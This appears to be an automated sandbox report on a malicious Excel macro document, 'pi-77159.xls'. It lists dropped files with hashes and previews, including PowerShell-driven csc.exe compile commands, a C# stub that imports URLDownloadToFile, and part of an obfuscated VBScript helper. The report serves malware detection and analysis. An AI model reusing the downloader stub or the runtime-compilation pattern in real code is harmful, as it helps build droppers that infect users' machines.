                                                                                                            MD5:C627E2BF6206E1B6E93D6B12C14385E0
                                                                                                            SHA1:4B00ADC8979180F9BAC02C9CEEB640C67A961B96
                                                                                                            SHA-256:C6987FE02324221A3DAB03CF3A1B3344AD27D350C6277CC4F35E21CD191B0A19
                                                                                                            SHA-512:6DB2AFEEBDBFCFB18F0C80B981843DE03C20120D95977A59B573DD259E099BE3089011FDBDCD970CF22E32FB7272407C448130A1CE84961A638E4FCD3A003B73
                                                                                                            Malicious:true
                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.0.cs"
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3072
                                                                                                            Entropy (8bit):2.835831782712569
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:etGSXePBG5eAdF8O6kkFh+t4tkZfl3MEWI+ycuZhNOCPakSBCoPNnq:6lsAdeOsh+lJl3Mn1ulOoa3Bnq
                                                                                                            MD5:07D1402F6E25A36788118A81C9815269
                                                                                                            SHA1:3BFCE2564F3565FAD094B567CABEF9CBAC0E0CFD
                                                                                                            SHA-256:8F0B687957900ACEFB80AE11F56507738843755ECD19A3BBA7A2700CA65C262E
                                                                                                            SHA-512:E8AB561FF5314E629102FDECE165EE3FA7E1CB5739104757D545E42E7124631A7D728CFC915D330B5DB66FEBC8771B02531C1931A00CA8297908C24AE009E0C6
                                                                                                            Malicious:true
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................3.,.....y.....y.......................................... :.....P ......L.........R.....Y.....].....i.....n...L.....L...!.L.....L.......!.....*.......:.......................................#..........<Module>.qv
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):866
                                                                                                            Entropy (8bit):5.342696803099571
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:AId3ka6KzfEoyKaMD5DqBVKVrdFAMBJTH:Akka60fEoyKdDcVKdBJj
                                                                                                            MD5:47C25EAA628837E9BC7548CA04D2FE69
                                                                                                            SHA1:BDAB01ED6A0C935FF2F991A5FBF71F35ACAF1239
                                                                                                            SHA-256:7CEFBC91B1B170A8E3C76237CB063AAFA63E0607F397F9FB314DE078C6B21FAB
                                                                                                            SHA-512:3466505ACE0D4B734BBE8D05D31A097EB091621F8533EA7A897B75BA4CBCAE4313B7A37AEE4B4AB9B4B9948174A148484016ED2E4AAF973B695C451D74554ACB
                                                                                                            Malicious:false
                                                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            File Type:Unknown
                                                                                                            Category:dropped
                                                                                                            Size (bytes):652
                                                                                                            Entropy (8bit):3.102101036181248
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryupak7YnqqlePN5Dlq5J:+RI+ycuZhNgakSsPNnqX
                                                                                                            MD5:8545820872F68B9974806F4B96E86E88
                                                                                                            SHA1:C50763E96521796B8BEB9BB255F354CA6707AC7D
                                                                                                            SHA-256:31B511E608CEF09CFDF779D1477F607304637945B59851BFE5D18B8932F00EEB
                                                                                                            SHA-512:6F5D67D97AAD0DE0984BABCC3D4C4B2B22FCBAC006CA4FDE4C1F730CC6FBDC5A1F5B827EA1669A17CA9E026161E04DDE73B703F4FC7FE086509F5BA69F935860
                                                                                                            Malicious:false
                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.i.j.x.x.v.a.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.i.j.x.x.v.a.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (373)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):487
                                                                                                            Entropy (8bit):3.787386295423015
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:V/DsYLDS81zuA3Q88NemMGlBHjQXReKJ8SRHy4HpuyCrK6P6gYy:V/DTLDfuJNeKuXfHnCBbYy
                                                                                                            MD5:920EC087C1649B37D3E112B3D5CEB653
                                                                                                            SHA1:43582D6BD4F01B5585CDE7DFF378FA59D38E7F7F
                                                                                                            SHA-256:D0C9B5992704CAA64BB5429349502AE370A05E995CFE05650EE7ECC4142E5BAA
                                                                                                            SHA-512:C79F661748E9176F0F01D405530C4704C7AAB611C2D614F537EA7A7778C846A98A6156DD1F35BBE5AB5644D9C582C1DE6D859925040C7A78AA44D21C19FFC673
                                                                                                            Malicious:false
                                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace IrRz.{. public class iAywni. {. [DllImport("urLMOn.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr TckVLj,string VIV,string EXlnPJrpNQc,uint bEjz,IntPtr yZVSsDMddO);.. }..}.
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):369
                                                                                                            Entropy (8bit):5.252923832895162
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fUIUzxs7+AEszIP23fUW:p37Lvkmb6KzkWZEoh
                                                                                                            MD5:7AE459464AC95B17B387B6BA13E99879
                                                                                                            SHA1:2A2CACB74B02E1F972FA455422B052FD4956C34C
                                                                                                            SHA-256:E1FA4F787596A841D64A15F8824BD39A2750716FF50B5A0EF9232BC3E77AAA31
                                                                                                            SHA-512:31CA12E27BD6BAE64BC454DC61260CEB0EC9912A5795A1ADC1954C6A8D1595A7BC47CB50FAC3E795B3F44C4DAB7C764431D122A3B69794C7353E711FEDE574FC
                                                                                                            Malicious:false
                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.0.cs"
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            File Type:Unknown
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3072
                                                                                                            Entropy (8bit):2.8307452944794065
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:etGSBPBG5eAdF8O6kkFS+t4tkZfYEtMEWI+ycuZhNgakSsPNnq:6KsAdeOsS+lJYsMn1ulga38q
                                                                                                            MD5:AD65E2389D9A5A164075DC5EC257BB50
                                                                                                            SHA1:F4A101F8C2BD39D5378707C2CE3EFA245B97AA2D
                                                                                                            SHA-256:94546DCA955BA11274FB4E2A5872CD51BC67E365EC1D6CD9332A9EB7A6C15EDD
                                                                                                            SHA-512:0F9F727B2B5BAC7ADE0CC07ECE8686447B86FE80E4B64207801A9C89E6BC1E629E61B3200E9418C2550A6BF0656E40254DD5F8CD0C5018ADC0ABF504D234D284
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):866
                                                                                                            Entropy (8bit):5.351145333094713
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:AId3ka6KzFEoEKaMD5DqBVKVrdFAMBJTH:Akka60FEoEKdDcVKdBJj
                                                                                                            MD5:810D2A38D09940E8344F1F2EBF7602E6
                                                                                                            SHA1:8B809AB2455519E5BF1FFC76A2252B6B6A5EBCC8
                                                                                                            SHA-256:24A253DC9CA675FF33E2411815FF48579F9FA825E6F89FFC787FC41646DA7539
                                                                                                            SHA-512:73470D39F887DC268EC327A735DD3981FD4C834D498D89160A2DDB6F93AD738686DF41A84B97EF57CB24F1FEEBCDE7BBCA1D80200691F1B193014C47491A4E6E
                                                                                                            Malicious:false
                                                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):676352
                                                                                                            Entropy (8bit):7.983853789524333
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:uI9dGDGCB/uxqIVyTVRqfPSMCfhhBK9leN+q+fS6IwOE:XHuBuqIVyhRwSNjBK9g+DfS6FO
                                                                                                            MD5:F5E5E6E72AD742EECBED915E5417A2C5
                                                                                                            SHA1:7B93B5FA6B3810552EFAF323B5EB6A18597A78E8
                                                                                                            SHA-256:79B218B61A450B7177346B0942B547B4097B2E544DF53771901D7413FD581307
                                                                                                            SHA-512:CD663CA79B75DECD67F8FCE4AE5A439C0812CCEE23CFDB9129CC6D510CE64A96C9C0F6C3115A5DC9C9608076199726771CAC037818A7EF85A2C9FA82714B82CF
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):684032
                                                                                                            Entropy (8bit):7.9392103257457505
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:SI9dGDGCB/uxqIVyTVRqfPSMCfhhBK9leN+q+fS6IwOE:jHuBuqIVyhRwSNjBK9g+DfS6FO
                                                                                                            MD5:603F43C36725CC4EEEE77EB655163AF6
                                                                                                            SHA1:CAA92BD85E85F67F23B32B6F7ABF16E14E16BE60
                                                                                                            SHA-256:4E9326CE3B3968CBBFBB01E3B98F35B053CFC00664E6E37FAE8A6CCE98927728
                                                                                                            SHA-512:4FAA4A8885587EBE7AAB3B9151578B7F2368443887CD516330EF6C332B09B20876593DF3795A5C19352AE707A2EFBD39BB28B0AB53AE0A2F59BFC404E3312D3E
                                                                                                            Malicious:false
                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):10240
                                                                                                            Entropy (8bit):0.6739662216458647
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
                                                                                                            MD5:C61F99FE7BEE945FC31B62121BE075CD
                                                                                                            SHA1:083BBD0568633FECB8984002EB4FE8FA08E17DD9
                                                                                                            SHA-256:1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
                                                                                                            SHA-512:46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
                                                                                                            Malicious:false
                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):24152
                                                                                                            Entropy (8bit):0.7513521539333206
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:CMLhbFnirW0rAHV4Ji9Tp5fGtFTIvs5/KUC6m6C9xRjNi1uiHIzVp9:CMBFF0kKJoTetFTFZKR6axR6uiozVb
                                                                                                            MD5:8A8D71BED4B5760F2F82C680C2C8CACC
                                                                                                            SHA1:FA589EA7BA858C514079289BCEA3625432110427
                                                                                                            SHA-256:78CF9C5CCAC6BEF4326F7514D4083BBC223347412A3D2975EDA8AD679D4EEB2B
                                                                                                            SHA-512:8D06BAC9D7433AAAD1126CF922F133FF2946A830507BFA0308677D3D81E5559A708D7733BB87C9CA70A8146DD6C2DB5B50A4D97F9442FE615483711B12445BC9
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (376), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):142466
                                                                                                            Entropy (8bit):3.674082413060924
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:41jUPF8/vqjQ2AMYdCZc1uIj9X0EBz4jfOMaTUfgt5pzGGwm:VdkvqjQ2ArCjIB0k4jfOMaTsgt5pCGwm
                                                                                                            MD5:DA5A2B2A39D7AB8B9F9ADF8AF69A5F61
                                                                                                            SHA1:7588E7A25BF351AC5A16ECA9B68686C7970E60E5
                                                                                                            SHA-256:99D85E0AB098EFE5FF79ED0F26F5543BE8D9DC316132A80BA72001CCA355E89F
                                                                                                            SHA-512:D042E1BA33995BA500DD91218AAAB47310B31AEFA91862F744719EA659EB235080DE25649E50AED2ECE84C1AFF78C25BEE6B8DBE5C680AFFA925516F61F95D8A
                                                                                                            Malicious:true
                                                                                                             Preview (UTF-16 text decoded to plain text; output is truncated at the same point as the original preview):
                                                                                                             Function restivo(ByVal ambarino, ByVal pneometria, ByVal contramartelos)
                                                                                                                 Dim esfalfamento
                                                                                                                 esfalfamento = InStr(ambarino, pneometria)
                                                                                                             
                                                                                                                 Do While esfalfamento > 0
                                                                                                                     ambarino = Left(ambarino, esfalfamento - 1) & contramartelos & Mid(ambarino, esfalfamento + Len(pneometria))
                                                                                                                     esfalfamento = InStr(esfalfamento + Len(contramartelos), ambarino, pneometria)
                                                                                                                 Loop
                                                                                                             
                                                                                                                 restivo = ambarino
                                                                                                             End Function
                                                                                                             
                                                                                                             private function ReadStdIn()
                                                                                                                 while Not stdIn...
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 15:57:45 2024, Security: 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):935936
                                                                                                            Entropy (8bit):7.986311019174553
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:1HuBuqIVyhRwSNjBK9g+DfS6FO88u5viBGmRYkg:ouHohR/NjBKi+LSoOLMyrRYR
                                                                                                            MD5:10419D9E0542858E14BD1DC78C2BE28F
                                                                                                            SHA1:9197BE297011961C10A233E1A570D1B537F4B1D7
                                                                                                            SHA-256:AD1147B4C2B7492602B57B77B19860ABFCC882F17CE1C7548811CDC12F69A358
                                                                                                            SHA-512:524405CE8530D5984169BFAE25A62D4A27B8239616CBA135179CA2A139F7AD6E04B9CBD8C992B5B98E8127220729BE3371242D0E70E7EA04ADC9E2F66B6759A9
                                                                                                            Malicious:false
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:false
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 15:57:45 2024, Security: 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):935936
                                                                                                            Entropy (8bit):7.986311019174553
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:1HuBuqIVyhRwSNjBK9g+DfS6FO88u5viBGmRYkg:ouHohR/NjBKi+LSoOLMyrRYR
                                                                                                            MD5:10419D9E0542858E14BD1DC78C2BE28F
                                                                                                            SHA1:9197BE297011961C10A233E1A570D1B537F4B1D7
                                                                                                            SHA-256:AD1147B4C2B7492602B57B77B19860ABFCC882F17CE1C7548811CDC12F69A358
                                                                                                            SHA-512:524405CE8530D5984169BFAE25A62D4A27B8239616CBA135179CA2A139F7AD6E04B9CBD8C992B5B98E8127220729BE3371242D0E70E7EA04ADC9E2F66B6759A9
                                                                                                            Malicious:true
                                                                                                            Preview:......................>...................................$...........................................................g.......i.......................................................................................................................................................................................................................................................................................................................................................................................................!................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 07:51:58 2024, Security: 1
                                                                                                            Entropy (8bit):7.980524078913288
                                                                                                            TrID:
                                                                                                            • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                            File name:pi-77159.xls
                                                                                                            File size:1'136'640 bytes
                                                                                                            MD5:65fbcc8da027e55f200e662f94037339
                                                                                                            SHA1:a45ff70dd8f364f4d3f0d4be15430fd288bdbbf7
                                                                                                            SHA256:cc01815d54a289d110af781b87dea4c4625d068f6a4f13aaa39d25fd723c136d
                                                                                                            SHA512:bcf76e0ad9dc6a4056b5815fb1dd424dd7f0c175debc15fc878a3fc9f2a8c29df5bc00156ab378cac77ec4a9c7b8e8e2d688d97236b0966d1ffba013359b68d6
                                                                                                            SSDEEP:24576:5uq9PLiijE2Z5Z2amLKuhoF84LJQohXvFClUd7nZDiTtOZc:5uEPLiij7Z5ZKLGFjLJQohXvFTNnb6
                                                                                                            TLSH:BD352351FDC9DE87E29AA9320CD7C9B215147C82BE9C66452B62B35F34B86F10F831D8
                                                                                                            File Content Preview:........................>.......................................................................................................j.......l.......n..............................................................................................................
                                                                                                            Icon Hash:276ea3a6a6b7bfbf
                                                                                                            Document Type:OLE
                                                                                                            Number of OLE Files:1
                                                                                                            Has Summary Info:
                                                                                                            Application Name:Microsoft Excel
                                                                                                            Encrypted Document:True
                                                                                                            Contains Word Document Stream:False
                                                                                                            Contains Workbook/Book Stream:True
                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                            Contains Visio Document Stream:False
                                                                                                            Contains ObjectPool Stream:False
                                                                                                            Flash Objects Count:0
                                                                                                            Contains VBA Macros:True
                                                                                                            Code Page:1252
                                                                                                            Author:
                                                                                                            Last Saved By:
                                                                                                            Create Time:2006-09-16 00:00:00
                                                                                                            Last Saved Time:2024-11-20 07:51:58
                                                                                                            Creating Application:Microsoft Excel
                                                                                                            Security:1
                                                                                                            Document Code Page:1252
                                                                                                            Thumbnail Scaling Desired:False
                                                                                                            Contains Dirty Links:False
                                                                                                            Shared Document:False
                                                                                                            Changed Hyperlinks:False
                                                                                                             Application Version:786432 (0x000C0000: major version 12, i.e. the Excel 2007 application version stamped into DocumentSummaryInformation)
                                                                                                            General
                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                            VBA File Name:Sheet1.cls
                                                                                                            Stream Size:977
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0 .
                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 ea 9b e2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Attribute VB_Name = "Sheet1"
                                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                                            Attribute VB_Creatable = False
                                                                                                            Attribute VB_PredeclaredId = True
                                                                                                            Attribute VB_Exposed = True
                                                                                                            Attribute VB_TemplateDerived = False
                                                                                                            Attribute VB_Customizable = True
                                                                                                            

